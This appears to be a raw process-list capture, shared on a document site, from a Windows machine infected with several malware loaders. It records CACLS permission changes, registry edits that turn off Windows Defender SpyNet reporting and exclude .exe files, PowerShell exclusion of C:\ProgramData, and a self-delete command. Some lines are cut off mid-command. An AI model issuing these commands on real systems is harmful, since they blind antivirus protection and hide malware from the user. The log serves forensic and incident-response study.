ID: 18728, Name: 6MpsqEM6tHxdRKveVmU4DXSZ.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\6MpsqEM6tHxdRKveVmU4DXSZ.exe"
===============
ID: 18832, Name: cmd.exe, CommandLine: cmd.exe /d /c bwsjhihxsxf.bat 3956101466505
===============
ID: 18864, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 18872, Name: is-E3SOI.tmp, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
is-NQ34P.tmp\is-E3SOI.tmp" /SL4 $207B2 "C:\Users\CONSULT SOIL TESTING\Pictures\
Minor Policy\6MpsqEM6tHxdRKveVmU4DXSZ.exe" 2562561 56320
===============
ID: 18884, Name: Zhcf2b7KCQFYNg6CsB_NaYQZ.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Zhcf2b7KCQFYNg6CsB_NaYQZ.exe"
===============
ID: 18912, Name: Y9J1AhEb4sEX34ee_jM060cY.exe, CommandLine: "C:\Users\CONSULT SOIL
TESTING\Pictures\Minor Policy\Y9J1AhEb4sEX34ee_jM060cY.exe"
===============
===============
===============
===============
===============
===============
ID: 19412, Name: oneetx.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
cb7ae701b3\oneetx.exe"
===============
===============
ID: 19448, Name: ge486920.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP001.TMP\ge486920.exe
===============
ID: 19524, Name: cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /k echo Y|
CACLS "oneetx.exe" /P "CONSULT SOIL TESTING:N"&&CACLS "oneetx.exe" /P "CONSULT SOIL
TESTING:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "CONSULT SOIL TESTING:N"&&CACLS "..\
cb7ae701b3" /P "CONSULT SOIL TESTING:R" /E&&Exit
===============
===============
===============
ID: 19960, Name: ge486920.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP001.TMP\ge486920.exe
===============
ID: 19984, Name: WerFault.exe, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p
19448 -s 580
===============
ID: 20076, Name: conhost.exe, CommandLine: conhost.exe lyjxmdxahyk.dat
3956101466505
===============
ID: 20132, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f
/v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
===============
ID: 20148, Name: foto0165.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
1000001051\foto0165.exe"
===============
Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\
Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
===============
ID: 20232, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 20328, Name: powershell.exe, CommandLine: "powershell" -Command Add-
MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 20364, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929472286
===============
===============
===============
===============
===============
ID: 20568, Name: un969304.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP002.TMP\un969304.exe
===============
Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f
/v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
===============
ID: 20620, Name: un463571.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP003.TMP\un463571.exe
===============
===============
ID: 20748, Name: pr721824.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP006.TMP\pr721824.exe
===============
ID: 20824, Name: cmd.exe, CommandLine: /C REG ADD "HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v
"SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
===============
ID: 20840, Name: cmd.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t
6 & del /f /q "C:\Users\CONSULT SOIL TESTING\Pictures\Minor Policy\
ayi6H9CyWLbMfxxhMvRVWcx9.exe" & exit
===============
===============
Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\
Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
===============
Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0
/reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v
"SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
===============
ID: 21000, Name: fotocr20.exe, CommandLine: "C:\Users\CONSUL~1\AppData\Local\Temp\
1000002051\fotocr20.exe"
===============
ID: 21036, Name: reg.exe, CommandLine: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\
Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
===============
ID: 21088, Name: zirH4300.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP007.TMP\zirH4300.exe
===============
ID: 21144, Name: ziKf7847.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP008.TMP\ziKf7847.exe
===============
ID: 21160, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929475484
===============
ID: 21188, Name: it726891.exe, CommandLine: C:\Users\CONSUL~1\AppData\Local\Temp\
IXP009.TMP\it726891.exe

Process List

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Process List

Uploaded by

Copyright:

Available Formats

***********************************************

ID: 896, Name: csrss.exe, CommandLine:

You might also like